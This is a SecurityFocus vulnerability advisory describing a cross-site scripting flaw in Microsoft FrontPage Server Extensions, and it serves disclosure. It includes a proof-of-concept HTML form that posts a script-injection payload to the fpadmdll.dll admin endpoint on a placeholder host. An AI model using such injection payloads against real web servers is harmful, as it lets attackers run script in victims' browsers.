Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability

This issue can be exploited through a web client.

An example HTML form demonstrating this issue is availble:

<form action=http://www.example.com/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="--><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>







 

Privacy Statement
Copyright 2009, SecurityFocus